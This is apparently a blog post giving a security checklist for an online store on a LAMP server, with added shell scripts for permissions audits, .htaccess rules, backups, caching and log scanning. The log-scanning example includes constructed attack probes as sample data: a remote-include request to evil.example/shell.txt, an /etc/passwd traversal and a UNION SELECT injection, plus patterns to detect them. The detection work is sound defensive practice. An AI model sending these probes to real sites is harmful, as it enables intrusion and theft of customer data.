Here is a list of basic security measures you can carry out to protect your store. Use it as a checklist and consider implementing any that are missing from your server's security policy. Some of these steps have server requirements that may or may not be available to you, depending on your hosting plan. This post is for stores on Linux servers with a LAMP (Linux, Apache, MySQL, PHP) configuration.
These ideas come from a variety of sources, in particular zen-cart, which ships a number of useful security features and recommendations with its cart.
Check and Set Permissions
Permissions are assigned to each folder and file and define the access rights of specific users and groups.
- Folders should be a maximum of 755; however, certain folders (/images, /admin/backups, /tmp) may require 757 so that the cart can write to them, depending on your server configuration. All files should be 644 (configure.php files 444 if possible). Any mode ending in 7 makes the entry world-writable, which on a shared host means every other account on the machine can write to it, so use it only where your host insists; if PHP runs as your own user (suPHP, suEXEC or PHP-FPM), 755 is enough even for the folders the cart writes to.
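As an added example (not code from the original post or from zen-cart), here is a POSIX shell script that audits a store for the dangerous modes and then resets the baseline from the list above. The web root path is an argument; the list of writable folders is an assumption taken from the bullet, so adjust it to your cart's layout.

```shell
#!/bin/sh
# Added example, not code from the original post or from any cart: audits and
# resets file permissions under a store's web root. The root path is an
# argument; the writable folders below are an assumption (adjust to your
# cart). The writable mode defaults to 755, which is enough when PHP runs as
# your own account (suPHP, suEXEC, PHP-FPM); pass 757 only if the host insists.
set -eu

WRITABLE_DIRS="images admin/backups tmp"

# List entries that are world-writable or carry a setuid/setgid bit: on a shared
# host these let any other account plant or replace files in your store.
audit_perms() {
    find "$1" \( -perm -0002 -o -perm -4000 -o -perm -2000 \) -print | sort
}

# Number of findings as a single integer (grep -c prints 0 on no match but
# exits 1, hence the || true so the caller's set -e is not tripped).
audit_count() {
    audit_perms "$1" | grep -c . || true
}

# Reset to the baseline: 755 folders, 644 files, 444 for every configure.php,
# then re-open only the folders the cart must write into.
fix_perms() {
    root=$1
    mode=${2:-755}
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    find "$root" -type f -name configure.php -exec chmod 444 {} +
    for d in $WRITABLE_DIRS; do
        if [ -d "$root/$d" ]; then
            chmod "$mode" "$root/$d"
        fi
    done
}

# Cron-style entry point: report, fix, and exit non-zero if anything was found
# so cron's mail tells you something changed since the last run.
audit_and_fix() {
    n=$(audit_count "$1")
    audit_perms "$1"
    fix_perms "$1"
    [ "$n" -eq 0 ]
}
```

Run `audit_and_fix /path/to/public_html` from a nightly cron job; the mail you get lists exactly which files drifted, which is often the first sign that an upload form or a compromised FTP account has been used to drop files into the store.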
Disable the ‘Allow Guest to Tell a Friend’ feature
Some carts let any visitor send email through this feature. Disabling it prevents non-logged-in customers from using your server to send spam, which would also get your server's address blacklisted by mail providers.
Update your store and module software to the latest versions and patches
With every new software release there are usually security or bug fixes that improve the functionality and stability of your store. If you don't upgrade, attackers can easily exploit your website through known vulnerabilities, for which working exploits are usually circulating soon after the fix is published.
Use local htaccess files to restrict script execution, access
For local htaccess files to work, the server must be set up to allow them, usually via an 'AllowOverride All' or 'AllowOverride Limit' directive in the Apache httpd.conf file. Check with your hosting company whether this is configured, and which override classes are granted: 'Limit' only enables the Order/Allow/Deny directives, while 'Header' needs 'FileInfo', 'Options' needs 'Options' and the Expires directives later in this post need 'Indexes'.
- In the htaccess file itself, start by denying access to everything:
Deny from all
Then allow access only to the specific files that need to be served:
Allow from all
For example, in the /images folder, allow only image files:
Allow from all
To block direct requests to files in, say, the /cache folder (which visitors should never fetch directly):
Deny from All
Each of these directives belongs inside a <Files> or <FilesMatch> block naming the files it applies to; a bare 'Allow from all' following 'Deny from all' would simply re-open the whole folder. Note also that Order, Allow and Deny are Apache 2.2 syntax: Apache 2.4 replaced them with 'Require all denied' / 'Require all granted' and only honours the old form when mod_access_compat is loaded.
For a folder of downloads, add the following so that files are offered as 'Save As' attachments rather than rendered or run by the browser (the Header directive needs mod_headers; note that 'Order Allow,Deny' is written without a space after the comma):
Order Allow,Deny
Allow from all
Header set Content-Disposition attachment
If you want to stop snoopers listing the contents of a folder, there are several ways to do it. First establish whether your hosting company already does this in the Apache config file. Ask whether the following is present:
Options -Indexes -ExecCGI
(-ExecCGI is useful because it stops CGI scripts executing in the folder; it does not affect PHP files handled by mod_php, so an upload folder additionally needs PHP files denied or the PHP handler disabled there.)
If not, add that Options line to a local htaccess file in each folder you want protected (this needs AllowOverride Options). Alternatively, ask what DirectoryIndex is set to (usually it will be "index.php"): if so, uploading a blank index.php to the folder also suppresses the listing, although it does not stop anyone who already knows a file's name from requesting it.
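The procedure above, as an added example that is not code from the original post or from any cart: a shell script that writes the per-folder .htaccess files described (default deny, allow only image types in /images, deny everything in /cache and /admin/backups, Save-As headers for downloads, listings off everywhere). The folder names and the allowed extensions are illustrative assumptions; match them to your cart's layout. Each rule is emitted in both the Apache 2.2 and 2.4 form so one file is valid on either version.

```shell
#!/bin/sh
# Added example, not from the original post: writes the per-folder .htaccess
# files the section above describes. Folder names (images, cache, download,
# admin/backups) and the extension lists are assumptions to adapt. The host
# must grant AllowOverride Limit, Options and FileInfo (or All).
set -eu

# Apache 2.2 uses Order/Allow/Deny; 2.4 uses Require (the old directives only
# work there with mod_access_compat). Emitting both inside <IfModule> keeps
# the file valid on either version.
deny_all() {
    cat <<'EOF'
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order Deny,Allow
    Deny from all
</IfModule>
EOF
}

allow_all() {
    cat <<'EOF'
<IfModule mod_authz_core.c>
    Require all granted
</IfModule>
<IfModule !mod_authz_core.c>
    Order Deny,Allow
    Allow from all
</IfModule>
EOF
}

# Web root: listings off, and refuse to serve files that should never be
# fetched (dumps, archives, logs, config copies) even if they end up here.
write_root_htaccess() {
    {
        printf '%s\n' 'Options -Indexes'
        printf '%s\n' '<FilesMatch "\.(sql|zip|gz|tar|bak|log|ini)$">'
        deny_all
        printf '%s\n' '</FilesMatch>'
    } > "$1/.htaccess"
}

# Upload/image folder: default deny, then allow only image types, so a .php
# file smuggled in through an upload form is neither served nor executed.
write_images_htaccess() {
    {
        printf '%s\n' 'Options -Indexes -ExecCGI'
        deny_all
        printf '%s\n' '<FilesMatch "\.(jpe?g|gif|png|ico)$">'
        allow_all
        printf '%s\n' '</FilesMatch>'
    } > "$1/.htaccess"
}

# Folders nothing should ever be requested from (cache, backups): deny all.
write_denied_htaccess() {
    {
        printf '%s\n' 'Options -Indexes -ExecCGI'
        deny_all
    } > "$1/.htaccess"
}

# Download folder: browsers get a Save As dialog rather than rendering or
# running the file, and listings are off so customers cannot browse the rest.
write_downloads_htaccess() {
    {
        printf '%s\n' 'Options -Indexes -ExecCGI'
        printf '%s\n' '<IfModule mod_headers.c>'
        printf '%s\n' '    Header set Content-Disposition attachment'
        printf '%s\n' '</IfModule>'
    } > "$1/.htaccess"
}

install_htaccess_set() {
    root=$1
    mkdir -p "$root/images" "$root/cache" "$root/download" "$root/admin/backups"
    write_root_htaccess "$root"
    write_images_htaccess "$root/images"
    write_denied_htaccess "$root/cache"
    write_denied_htaccess "$root/admin/backups"
    write_downloads_htaccess "$root/download"
}
```

After installing, request an image, a cached file and a .php file placed in /images from a browser: only the image should come back, the others should return 403. A mis-typed directive in any of these files produces a 500 for the whole folder, so test on a copy of the site first.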
Monitor your error and access logs
You're looking for suspicious entries here: requests for pages that don't exist on your site; requests with 'http://' in the query string after index.php (a remote file inclusion probe); '../' sequences; SQL keywords in parameters; bursts of POSTs to the admin login; that sort of thing. Your store may have /error or /debug folders in its directory structure; check those too, since they record what went wrong on the server side, and make sure they cannot be read from the web.
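As an added example (not from the original post), here is a first-pass scan over an Apache combined-format access log for the patterns just described. The log lines are constructed for illustration, as is the /admin/ path; your cart's admin folder will have its own name.

```shell
#!/bin/sh
# Added example, not from the original post: scans an Apache combined-format
# access log for remote-include, traversal and SQL-injection probes and for
# bursts of admin-login POSTs. Sample log lines and the /admin/ path are
# constructed for illustration.
set -eu

# Constructed sample: normal traffic mixed with a remote-file-inclusion probe,
# a directory-traversal probe, an SQL-injection probe and a login burst.
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "GET /index.php?main_page=product_info&products_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:10:00:05 +0000] "GET /index.php?main_page=http://evil.example/shell.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.8"
198.51.100.7 - - [10/Oct/2023:10:00:06 +0000] "GET /images/../../../../etc/passwd HTTP/1.1" 404 320 "-" "libwww-perl/5.8"
192.0.2.9 - - [10/Oct/2023:10:01:00 +0000] "GET /index.php?products_id=12%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
203.0.113.5 - - [10/Oct/2023:10:02:00 +0000] "GET /images/logo.png HTTP/1.1" 200 8000 "http://shop.example/" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2023:10:03:00 +0000] "POST /admin/login.php HTTP/1.1" 200 900 "-" "python-requests/2.0"
192.0.2.9 - - [10/Oct/2023:10:03:01 +0000] "POST /admin/login.php HTTP/1.1" 200 900 "-" "python-requests/2.0"
192.0.2.9 - - [10/Oct/2023:10:03:02 +0000] "POST /admin/login.php HTTP/1.1" 200 900 "-" "python-requests/2.0"
EOF
}

# Print "<tag> <line>" for each suspicious request. Only the request field ($7)
# is inspected: the Referer field legitimately contains http://, and a naive
# grep over the whole line would flag every visitor who followed a link.
scan_access_log() {
    awk '
    {
        req = $7
        tag = ""
        # a URL inside the query string of a script: remote-include attempt
        if (req ~ /\.php\?[^ ]*https?:\/\//) { tag = "RFI" }
        else if (req ~ /\.\.\//) { tag = "TRAVERSAL" }
        else if (tolower(req) ~ /union(%20|\+| )+select/) { tag = "SQLI" }
        if (tag != "") print tag, $0
    }' "$1"
}

# POSTs to the admin area per client address, busiest first; a burst from one
# address is a password-guessing run against the admin login.
admin_login_posts() {
    awk '$6 == "\"POST" && $7 ~ /^\/admin\// { n[$1]++ }
         END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}
```

Run `scan_access_log /var/log/apache2/access.log` and `admin_login_posts` from cron and mail yourself the output; anything tagged RFI against a 200 response deserves an immediate look at what the included URL contained.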
Backup your store regularly
MySQL database: this can be done through Admin/Tools/MySQL Backup. Use whatever compression is available. Avoid downloading the compressed backup over an unencrypted (http://) connection. The zipped backup file is created in admin/backups, so secure this folder too: deny web access to it with an htaccess file and move or delete old dumps, because a downloadable database dump is your entire customer list.
Your store's files: these are NOT saved by the MySQL backup and must be copied separately. Basically you need a copy of everything under /catalog (or the web root, often called public_html), including the configure.php files.
Server settings: more applicable to stores running on their own server (in which case you should already have a maintenance program set up); otherwise check with your hosting company how they back up the server configuration.
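The backup routine above, as an added example that is not code from the original post or from any cart: a shell script that archives the store files and the database into a folder outside the web root, readable only by the owner, and prunes old copies. Paths and the credentials file are assumptions; the MySQL password is read from a my.cnf-style file rather than passed on the command line, where other users on a shared host could read it from the process list.

```shell
#!/bin/sh
# Added example, not from the original post: nightly backup of a store's files
# and database to a folder outside the web root. Paths, database name and the
# credentials file are assumptions.
set -eu

# Archive the store files into $dest; the folder and the archive are readable
# by the owner only, since the tarball contains configure.php with the DB
# password in it.
backup_files() {
    root=$1; dest=$2
    stamp=$(date +%Y%m%d)
    mkdir -p "$dest"
    chmod 700 "$dest"
    archive="$dest/files-$stamp.tar.gz"
    tar -czf "$archive" -C "$root" .
    chmod 600 "$archive"
    echo "$archive"
}

# Dump the database with gzip compression. Needs mysqldump and a credentials
# file (mode 600) of the form:
#   [client]
#   user=store
#   password=...
# --defaults-extra-file must be the first option on the mysqldump command line.
backup_database() {
    dbname=$1; credfile=$2; dest=$3
    stamp=$(date +%Y%m%d)
    mkdir -p "$dest"
    chmod 700 "$dest"
    out="$dest/$dbname-$stamp.sql.gz"
    mysqldump --defaults-extra-file="$credfile" --single-transaction "$dbname" \
        | gzip -9 > "$out"
    chmod 600 "$out"
    echo "$out"
}

# Delete backups older than N days so the backup folder does not keep every
# copy of the customer database forever.
prune_backups() {
    dest=$1; days=$2
    find "$dest" -type f \( -name '*.tar.gz' -o -name '*.sql.gz' \) \
        -mtime +"$days" -exec rm -f {} +
}

# Typical cron entry point; all three paths are assumptions.
nightly() {
    backup_files /home/store/public_html /home/store/backups
    backup_database storedb /home/store/.my-backup.cnf /home/store/backups
    prune_backups /home/store/backups 30
}
```

Copy the resulting archives off the server as well (scp or sftp, never plain FTP or http://), since a backup that sits only on the machine that gets compromised is no backup.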
Check with hosting company on what they have done to make your site secure
Your store can be severely compromised if your hosting company hasn't correctly secured the server. There are many protections they can enable (Suhosin, Apache config settings and php.ini settings are a few), so it pays to be clear about what they do to keep your store secure. This is particularly important if you're on a shared server and using shared SSL (not recommended).
Get a dedicated SSL certificate and static IP address for your store
A certificate issued for your own domain avoids sending customers to a shared-SSL hostname that isn't yours, and a static IP address is what hosts traditionally required to serve it; if you're serious about presenting a dependable, secure store, these are essential. (The static IP was needed because older servers and browsers could not pick a certificate per hostname on a shared address; with SNI now widely supported, the certificate is the part that matters.)
If your business warrants it, or you want additional assurance (especially if you run forum software or other scripts outside the cart on your site), hire a security consultant to check your site regularly: peace of mind in exchange for a few dollars.
Check this post about securing your admin for points specific to that utility's function. The admin is often the point of entry for hacking attempts.
Another useful Apache module, mod_headers, can be used to set a Cache-Control lifetime on files such as images and static HTML pages. Rather than fetching image files or unchanging HTML on every visit, the browser checks its cache for a copy of the requested file; if that copy is still 'fresh' (within the max-age specified), the cached version is used and no request is sent to the host server.
Your server needs mod_headers enabled before these directives can be used. Add the code to your root htaccess file, or to httpd.conf / vhosts.conf if you have access to those.
# cache html and htm files for 12 hours (43200 seconds)
Header set Cache-Control "max-age=43200"
# cache for one week (604800 seconds)
Header set Cache-Control "max-age=604800"
# cache flash and images for one month (2592000 seconds)
Header set Cache-Control "max-age=2592000"
# script files: remove the explicit lifetime
Header unset Cache-Control
Each Header directive applies to the files matched by the <FilesMatch> block it sits in; written one after another without those blocks, the later ones would simply overwrite the earlier. Unsetting Cache-Control for script files only removes the lifetime and leaves caching to browser heuristics; to keep cart, checkout and account pages out of caches entirely, those pages need a Cache-Control value of no-store.
When changing conf files on an Apache server, remember to check the syntax (apachectl configtest) and restart or reload Apache for the directives to take effect. A change to a .htaccess file takes effect immediately, and a typo there turns every request in that folder into a 500 error, so test on a copy of the site first.
Another approach is to use ExpiresByType directives (mod_expires) in the htaccess file:
# turn on the module for this directory
ExpiresActive On
# set default
ExpiresDefault "access plus 24 hours"
ExpiresByType image/jpg "access plus 1 month"
ExpiresByType image/gif "access plus 1 month"
ExpiresByType image/jpeg "access plus 1 month"
ExpiresByType image/png "access plus 1 month"
ExpiresByType image/x-icon "access plus 1 month"
ExpiresByType text/css "access plus 1 month"
ExpiresByType application/x-shockwave-flash "access plus 1 month"
Two notes: Apache serves .jpg files as image/jpeg, so the image/jpg line is harmless but redundant; and ExpiresDefault applies to every response type not listed, including the text/html pages PHP generates, so keep it short or drop it and list only the static types.
Final tip: remove ETags, so browsers rely on the lifetimes above rather than revalidating against inode-based tags that differ from server to server:
Header unset ETag
(FileETag None stops Apache generating them in the first place.)
If your server is running Apache 2.x, mod_deflate can compress text-type responses, which gives a real boost in loading speed: the client's browser does the decompressing rather than the server carrying the full transfer. To enable mod_deflate, add the compression rules to the root htaccess file (or, ideally, to httpd.conf or, on a virtual host, vhosts.conf). One caveat: compressing an HTTPS response that contains both a secret (a session or CSRF token) and input reflected from the request lets an attacker recover the secret through a compression side channel (BREACH), so leave compression off for such pages unless you can rule that out.
If your server is running Apache 1.x, mod_gzip can be used instead. Add this to the root htaccess file:
mod_gzip_on Yes
mod_gzip_item_include file \.(html?|txt|css|js|php|pl)$
mod_gzip_item_include handler ^cgi-script$
mod_gzip_item_include mime ^text.*
mod_gzip_item_exclude mime ^image.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
You might also like to enable the cart's own Gzip compression through Admin/Configuration/Gzip Compression, set at 9, but pick one of the three rather than stacking them: compressing twice costs CPU for no gain.
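The caching and compression sections above, as one added example that is not code from the original post or from any cart: a shell script that writes a root .htaccess combining the mod_expires, mod_headers and mod_deflate directives, each wrapped in <IfModule> so a host without the module serves a plain site instead of a 500 error. The lifetimes are the post's; the file-type lists and the no-store rule for PHP pages are assumptions to adapt. It needs AllowOverride FileInfo and Indexes (or All).

```shell
#!/bin/sh
# Added example, not from the original post: writes a root .htaccess with the
# caching and compression rules discussed above. File-type lists and the
# no-store rule for PHP pages are assumptions; lifetimes follow the post.
set -eu

write_perf_htaccess() {
    cat > "$1/.htaccess" <<'EOF'
# --- caching (mod_expires / mod_headers) ---
<IfModule mod_expires.c>
    ExpiresActive On
    # Only explicit static types: a catch-all ExpiresDefault would also stamp
    # the dynamic text/html pages PHP produces with a future Expires.
    ExpiresByType image/jpeg "access plus 1 month"
    ExpiresByType image/gif "access plus 1 month"
    ExpiresByType image/png "access plus 1 month"
    ExpiresByType image/x-icon "access plus 1 month"
    ExpiresByType text/css "access plus 1 week"
    ExpiresByType application/javascript "access plus 1 week"
    ExpiresByType application/x-javascript "access plus 1 week"
</IfModule>
<IfModule mod_headers.c>
    <FilesMatch "\.(jpe?g|gif|png|ico|swf)$">
        Header set Cache-Control "public, max-age=2592000"
    </FilesMatch>
    <FilesMatch "\.(css|js)$">
        Header set Cache-Control "public, max-age=604800"
    </FilesMatch>
    <FilesMatch "\.html?$">
        Header set Cache-Control "max-age=43200"
    </FilesMatch>
    # Cart, checkout and admin pages are per-session: forbid caching outright
    # rather than merely unsetting the header, which leaves it to heuristics.
    <FilesMatch "\.php$">
        Header set Cache-Control "no-store, no-cache, must-revalidate"
        Header set Pragma "no-cache"
    </FilesMatch>
    Header unset ETag
</IfModule>
FileETag None

# --- compression (mod_deflate, Apache 2.x) ---
<IfModule mod_deflate.c>
    AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css application/javascript application/x-javascript
    # Images and archives are already compressed: skip them.
    SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png|ico|zip|gz|swf)$ no-gzip dont-vary
    <IfModule mod_headers.c>
        # Let shared caches keep separate compressed and plain copies.
        Header append Vary Accept-Encoding env=!dont-vary
    </IfModule>
</IfModule>
EOF
}

# Check a live URL: expect "Content-Encoding: gzip" on text responses and the
# Cache-Control you set for that file type. A GET with the body discarded is
# used because HEAD responses need not carry Content-Encoding.
check_headers() {
    curl -sS -o /dev/null -D - -H 'Accept-Encoding: gzip' "$1" \
        | grep -iE '^(content-encoding|cache-control|expires|etag):'
}
```

Usage: `write_perf_htaccess /path/to/public_html`, then `check_headers https://shop.example/index.php` and `check_headers https://shop.example/images/logo.png`; the first should show gzip and no-store, the second a month-long max-age and no ETag line.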